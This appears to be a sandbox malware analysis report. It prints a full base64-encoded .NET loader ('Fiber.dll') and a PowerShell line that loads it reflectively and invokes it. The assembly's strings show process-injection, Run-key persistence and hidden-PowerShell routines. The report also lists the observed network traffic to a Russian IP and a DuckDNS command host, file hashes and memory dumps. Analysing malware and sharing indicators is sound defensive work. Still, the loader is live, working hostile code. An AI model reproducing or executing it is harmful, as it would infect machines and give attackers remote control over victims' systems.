xB38DJwAAAAAAAwBGAzABnAMpAAAAAAADAEYDJgGpAy0AAAAAAAMARgM1AbADLgAAAAAAAwAGGLEHfwMwAAAAAAADAEYDMAGcAzIAAAAAAAMARgMmAakDNgAAAAAAAwBGAzUBsAM3AAAAAAADAAYYsQd/AzkAAAAAAAMARgMwAbcDOwAAAAAAAwBGAyYBkANCAAAAAAADAEYDNQHGA0MAAAAAAAMABhixB38DSAAAAAAAAwBGAzABzwNKAAAAAAADAEYDJgHgA1EAAAAAAAMARgM1AekDUwAAAAAAAwAGGLEHfwNYAAAAAAADAEYDMAH0A1oAAAAAAAMARgMmAQUEYQAAAAAAAwBGAzUBEARkAAAAAAADAAYYsQd/A2kAAAAAAAMARgMwARsEawAAAAAAAwBGAyYBkANvAAAAAAADAEYDNQEnBHAAAAAAAAMABhixB38DcgAAAAAAAwBGAzABLQR0AAAAAAADAEYDJgFFBIAAAAAAAAMARgM1AVIEgwCnLQAAAAAGGLEHAQCNAAAAAQCSAAAAAQCCAAAAAgDYBgAAAwCUBAAgAQDDAQAAAQBXCQAgAgDDAQAAAQCSAAAAAgBoAAAAAQCSAAAAAQDWBgAAAQCSAAAAAQCSAAAAAQCSAAAAAgBoAAAAAQBrAQAAAgBEBQAAAwBnAgAAAQD8CQAAAQBrAQAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQBrAQAAAgCDCQAAAwAvBQAABAALAgAABQDMCQAABgBEBQAABwBnAgAAAQD8CQAAAQBrAQAAAgCDCQAAAwAvBQAABAALAgAABQDMCQAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDgBQAABgBEBQAABwBnAgAAAQDgBQAAAgD8CQAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDgBQAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDdAAAABgBEBQAABwBnAgAAAQAHBwAAAgDdAAAAAwD8CQAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDdAAAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwBEBQAABABnAgAAAQD8CQAAAQBgCQAAAgB3CQAAAQCSAAAAAgBoAAAAAQCnAQAAAgDNAQAAAwDoCAAABADXCAAABQCxCAAABgADCQAABwAmCgAACACRCgAACQCaBgAACgARBgAACwBEBQAADABnAgAAAQCaBgAAAgARBgAAAwD8CQAAAQCnAQAAAgDNAQAAAwDoCAAABADXCAAABQCxCAAABgADCQAABwAmCgAACACRCgAACQCaBgAACgARBgkAsQcBABkAsQcFABEAsQcBAAwAsQcBABQAsQcBABwAsQcBACQAsQcBAAwAkgAnABQAkgAnABwAkgAnACQAkgAnAEEAYQQsACkAIgkxACkAGgE2AFEAWQE6ACkABAVBAGEACwFIACkAsQcBADwAkgBcADQATQQnAGkATQQnADQAVwRnAGkAVwRnADQAsQcBAGkAsQcBACkAGQltAFEAdgpzAHEAsQd4AJEA7gB/AIkAsQcBALkAtQWGAMkAsQcBANEAVACMAMkArwSRANkASgKXAOEAAwGcAOEABAVBAMkA5wSiAOkA9gSnAPEAIQWuAKEA+wC0AOEAoAm5AAEBwAjBAAkBgwrIABkBsQcBAKkAsQcBAKkAdwHUAKkAmgHbAOEAoAngAKkAiwnbABkBpgbmABkBMgrsACkBMgfwAJkAXwr0AJkAyQj7AAkBKQkDAZkAcAQZAZkARAIBADEB1gQfATkBsQfbADkBwAglAeEAoAkyAUkBrgk5AVEBlwc/AVEBhQdFAVkB1AlJAWEBBAVaAWkB7QWXAOEApwlfAWkB2QHgAHEBmQlmAWEB4QFrAVkB5wlyAWkB2QG5AGkBFQWXAGkBtwGXAFkBnQWEAXkBuwmWAXkBUQebAWEBPgekAYkBsQcBAIkBQAqrAUEBsQfbAJEBDQUBAHkBjQSwATEBOwC2AeEAqwq7AaEB0wa+AbEAsQcBAKkBRADBAaEBeQTIAakBTADMAcEBhwrTAakB+gjgATEBRADpARkBzgDuARkBsAUBAPEBsQcBAPkBsQf4AQECsQcBAAkCsQfbABECsQfbABkCsQfbACECsQfbACkCsQfbADECsQfbADkCsQf9AUECsQfbAEkCsQfbAFECsQfbAFkCsQcBAGECsQcBAGkCsQcCAnECsQcBAA4AgACuAi4AGwNkBC4AIwNtBC4AKwOMBC4AMwOMBC4AOwOMBC4AQwOMBC4ASwOMBC4AUwOMBC4AWwOMBC4AYwOSBC4AawO8BC4AcwPJBC4AOgITBUAAEwAYBUMAEwAYBWMAEwAYBYMAewMTBYMAgwMTBaMAewMTBaMAgwMTBcMAEwAhBeMAewMTBeMAgwMTBSMBewMTBUMBEwAYBUMBiwMqBWMBEwAYBWMBWwOMBMACEwAYBeACEwAYBQADEwAYBQMDkwOMBSADEwAYBYADEwAYBcADEwAYBQsAwgIPAMICNgC/AgEAAAAAABYAAQAAAAAAFwAKAmoCjQKSAiIACwASABkAIABFAE4AVQBkAAABEQEtAYEB5gH1AUABJQBdAAEAQwEnAGgJAQAEgAAAAQAAAAAAAAAAAAAAAADsBgAACgAAAAAAAAAAAAAAnAK4AAAAAAAEAAAAAAAAAAAAAAClAsoFAAAAAAQAAAAAAAAAAAAAAKUClAAAAAAABAAAAAAAAAAAAAAApQIQAgAAAAAAAAAAAQAAAJcIAAAKAAQACwAEAAwACQANAAkADgAJAA8ACQAQAAkAEQAJABIACQATAAkAFAAJABUACQAWAAkAFwAJAAAAEAAWAJIAAAAAACkAkgAAABAANQCSAAAAAAA3AJIAWQApAnEAKQJZAC0CKAAzAigAOAIoAD0CKABCAigARwIoAEwCKABRAigAVgIoAFsCKABgAqEAZQIjAGUCIwCXAgAAAAAAQWAxAElFbnVtZXJhYmxlYDEAQ29udGV4dFZhbHVlYDEAa2VybmVsMzIATWljcm9zb2Z0LldpbjMyAFRvVUludDMyAFRvSW50MzIAVG9JbnQxNgBnZXRfVVRGOABMb2FkTGlicmFyeUEAQgBDAEQARQBGAFZBSQBTeXN0ZW0uSU8AUUJYdFgAUHJvamVjdERhdGEAbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3VhbEJhc2ljAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZAB0aHJlYWQAU3luY2hyb25pemVkAE5ld0d1aWQAUmVwbGFjZQBDcmVhdGVJbnN0YW5jZQBHZXRIYXNoQ29kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UARW51bWVyYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBoYW5kbGUARmlsZQBzZXRfV2luZG93U3R5bGUAUHJvY2Vzc1dpbmRvd1N0eWxlAHNldF9GaWxlTmFtZQBhcHBsaWNhdGlvbk5hbWUAR2V0RGlyZWN0b3J5TmFtZQBIb21lAGNvbW1hbmRMaW5lAENvbWJpbmUAQ2hhbmdlVHlwZQBWYWx1ZVR5cGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAdHlwZQBTeXN0ZW0uQ29yZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAQ2xvc2UAU3RyUmV2ZXJzZQBNdWx0aWNhc3REZWxlZ2F0ZQBEZWxlZ2F0ZUFzeW5jU3RhdGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE9iZnVzY2F0aW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAWWFub0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAFNldFZhbHVlAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAHN0YXJ0dXBfcmVnAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAQ29tcGFyZVN0cmluZwBUb1N0cmluZwBSZWZyZXNoAEdldEZ1bGxQYXRoAEdldEZvbGRlclBhdGgAbGVuZ3RoAEFzeW5jQ2FsbGJhY2sARGVsZWdhdGVDYWxsYmFjawBNYXJzaGFsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABGaWJlci5kbGwAS2lsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AUmFuZG9tAEJvb2xlYW4AYnl0ZXNXcml0dGVuAEdldEZpbGVOYW1lV2l0aG91dEV4dGVuc2lvbgBWZXJzaW9uAHByb2Nlc3NJbmZvcm1hdGlvbgBTeXN0ZW0uQ29uZmlndXJhdGlvbgBTeXN0ZW0uR2xvYmFsaXphdGlvbgBJbnRlcmFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ARmlsZUluZm8AQ3VsdHVyZUluZm8ARmlsZVN5c3RlbUluZm8Ac3RhcnR1cEluZm8Ac2V0X1N0YXJ0SW5mbwBQcm9jZXNzU3RhcnRJbmZvAERpcmVjdG9yeUluZm8AWmVybwBzdGFydHVwAFN5c3RlbS5MaW5xAEZpYmVyAFNwZWNpYWxGb2xkZXIAQnVmZmVyAGJ1ZmZlcgBSZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBDdXJyZW50VXNlcgBUb0dlbmVyaWNQYXJhbWV0ZXIAR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIAQml0Q29udmVydGVyAENvbXB1dGVyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5SZXNvdXJjZXMucmVzb3VyY2VzAGluaGVyaXRIYW5kbGVzAEdldEZpbGVzAEdldFZhbHVlTmFtZXMAdGhyZWFkQXR0cmlidXRlcwBwcm9jZXNzQXR0cmlidXRlcwBHZXRCeXRlcwBjcmVhdGlvbkZsYWdzAFN0cmluZ3MAUmVmZXJlbmNlRXF1YWxzAENvbnRhaW5zAENvbnZlcnNpb25zAFJ1bnRpbWVIZWxwZXJzAE9wZXJhdG9ycwBoUHJvY2VzcwBwcm9jZXNzAEdldFByb2NBZGRyZXNzAGJhc2VBZGRyZXNzAGFkZHJlc3MAc2V0X0FyZ3VtZW50cwBFeGlzdHMAQ29uY2F0AEZvcm1hdABDcmVhdGVPYmplY3QAUmVsZWFzZUNvbU9iamVjdABwcm90ZWN0AExhdGVHZXQAU3lzdGVtLk5ldABMYXRlU2V0AElBc3luY1Jlc3VsdABEZWxlZ2F0ZUFzeW5jUmVzdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABlbnZpcm9ubWVudABTdGFydABDb252ZXJ0AE5leHQAU3lzdGVtLlRleHQAY29udGV4dABBcnJheQBPcGVuU3ViS2V5AFJlZ2lzdHJ5S2V5AGdldF9Bc3NlbWJseQBBbnkAQmxvY2tDb3B5AGN1cnJlbnREaXJlY3RvcnkAUmVnaXN0cnkARW1wdHkAAAAAAB9GAGkAYgBlAHIALgBSAGUAcwBvAHUAcgBjAGUAcwAACygA+AArACgAKgABA2IAAA19AJEl+gAoAH0AIQABA2MAAAu2JfgA/f99ADQAAQNkAAALKADAJbIlKgAeIgEDZQAAEUAAQAD9/5ElQAArAEAAwCUBA3gAABHdISoAQAAfJrIlKAAqAJMhAQNoAAAR/f8fBH0A/f8aIh4mACb4AAEDdAAACygA+gAeIigAXQABAzEAABH6ACoAQABAACgA+AD6ACgAAQMyAAARwCUrAJIhkyF9APAAHya2JQEDOgAAEbYlOgAjAB4mKgDPJSoANAABAy8AAANcAAAJLgB2AGIAcwAACyoALgB2AGIAcwAAc0MAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBzAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlAABxIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAAQwBvAHAAeQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAqAC4AdgBiAHMAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgAAFbUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AAAlQAGEAdABoAAAbVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAAAAQAdUwBwAGUAYwBpAGEAbABGAG8AbABkAGUAcgBzAAAPUwB0AGEAcgB0AHUAcAAAG3sAMAB9AF8AewAxADoATgB9AC4AbABuAGsAAB1DAHIAZQBhAHQAZQBTAGgAbwByAHQAYwB1AHQAABlJAGMAbwBuAEwAbwBjAGEAdABpAG8AbgAAG24AbwB0AGUAcABhAGQALgBlAHgAZQAsADAAABVUAGEAcgBnAGUAdABQAGEAdABoAAAjVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAAAJdgAxAC4AMAAAHXAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAAE0EAcgBnAHUAbQBlAG4AdABzAACAmS0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAB7ADAAfQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA1ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAewAxAH0AASFXAG8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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAADAAAAEQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.zjn4*●*☞#:▶sr∞*▲◀(fom4*●*☞#:▶w∞*▲◀(n4*●*☞#:▶47.05.3](∞ú((úø(@@*ú.](∞ú(94*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.22.238.8.in-addr.arpa | udp |
| RU | 91.213.50.74:80 | 91.213.50.74 | tcp |
| US | 8.8.8.8:53 | 74.50.213.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | njnjnjs.duckdns.org | udp |
| US | 154.12.254.215:35888 | njnjnjs.duckdns.org | tcp |
| US | 8.8.8.8:53 | 215.254.12.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
memory/3192-142-0x000001F16B7C0000-0x000001F16B7E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a335pl53.cim.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3192-143-0x00007FFDDFFA0000-0x00007FFDE0A61000-memory.dmp
memory/3192-144-0x000001F16AF00000-0x000001F16AF10000-memory.dmp
memory/3192-145-0x000001F16AF00000-0x000001F16AF10000-memory.dmp
memory/4548-146-0x0000000000400000-0x000000000040C000-memory.dmp
memory/3192-149-0x00007FFDDFFA0000-0x00007FFDE0A61000-memory.dmp
memory/4548-150-0x0000000074E20000-0x00000000755D0000-memory.dmp
memory/4548-151-0x0000000005EA0000-0x0000000005F3C000-memory.dmp
memory/4548-152-0x00000000064F0000-0x0000000006A94000-memory.dmp
memory/4548-153-0x0000000006030000-0x0000000006040000-memory.dmp
memory/4548-154-0x0000000006040000-0x00000000060D2000-memory.dmp
memory/4548-155-0x0000000006000000-0x000000000600A000-memory.dmp
